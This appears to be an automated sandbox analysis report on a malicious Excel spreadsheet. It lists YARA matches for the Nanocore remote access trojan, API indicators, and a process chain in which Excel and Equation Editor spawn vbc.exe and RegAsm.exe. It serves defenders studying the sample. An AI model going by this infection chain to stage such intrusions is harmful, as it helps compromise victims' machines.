Source: 5.2.RegAsm.exe.2a44ddc.25.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.2a44ddc.25.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.vbc.exe.3486e00.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.vbc.exe.3486e00.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.vbc.exe.3486e00.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.2.vbc.exe.3627c48.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.vbc.exe.3627c48.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.vbc.exe.3627c48.8.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.RegAsm.exe.e10000.17.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.e10000.17.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegAsm.exe.a50000.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.a50000.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegAsm.exe.de4629.13.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.de4629.13.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegAsm.exe.de0000.14.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.de0000.14.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegAsm.exe.c10000.11.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.c10000.11.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegAsm.exe.cb0000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.cb0000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegAsm.exe.3b73634.26.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.3b73634.26.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.vbc.exe.3436de0.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.vbc.exe.3436de0.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.vbc.exe.3436de0.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.RegAsm.exe.de0000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.de0000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegAsm.exe.5c0000.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.5c0000.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.0.RegAsm.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.0.RegAsm.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.0.RegAsm.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.RegAsm.exe.c00000.10.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.c00000.10.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegAsm.exe.6c0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.6c0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.RegAsm.exe.660000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.660000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegAsm.exe.a50000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.a50000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegAsm.exe.e10000.17.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.e10000.17.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegAsm.exe.e14c9f.16.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.e14c9f.16.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegAsm.exe.2a5109c.23.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.2a5109c.23.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegAsm.exe.2a5109c.23.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.2.vbc.exe.3436de0.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.vbc.exe.3436de0.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.2.vbc.exe.340edc0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.vbc.exe.340edc0.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.RegAsm.exe.2a3fd90.24.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.2a3fd90.24.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegAsm.exe.2a3fd90.24.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.RegAsm.exe.3b73634.26.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.3b73634.26.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.RegAsm.exe.3b67402.28.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.3b67402.28.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.RegAsm.exe.2a44ddc.25.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.2a44ddc.25.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegAsm.exe.2a44ddc.25.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.RegAsm.exe.3b625d6.27.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.3b625d6.27.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Source: new[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: win33.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: 5.2.RegAsm.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.2.RegAsm.exe.400000.2.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.RegAsm.exe.400000.2.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.0.RegAsm.exe.400000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.0.RegAsm.exe.400000.4.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.0.RegAsm.exe.400000.4.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.0.RegAsm.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.0.RegAsm.exe.400000.2.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.0.RegAsm.exe.400000.2.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 5.2.RegAsm.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 5.2.RegAsm.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 5.0.RegAsm.exe.400000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 5.0.RegAsm.exe.400000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 5.0.RegAsm.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 5.0.RegAsm.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@6/20@41/2

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Ref 0180066743.xlsx

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\{4614bd42-26c0-4da0-8e09-16890d37c1d7}

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVREA4E.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Ref 0180066743.xlsx

ReversingLabs: Detection: 21%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
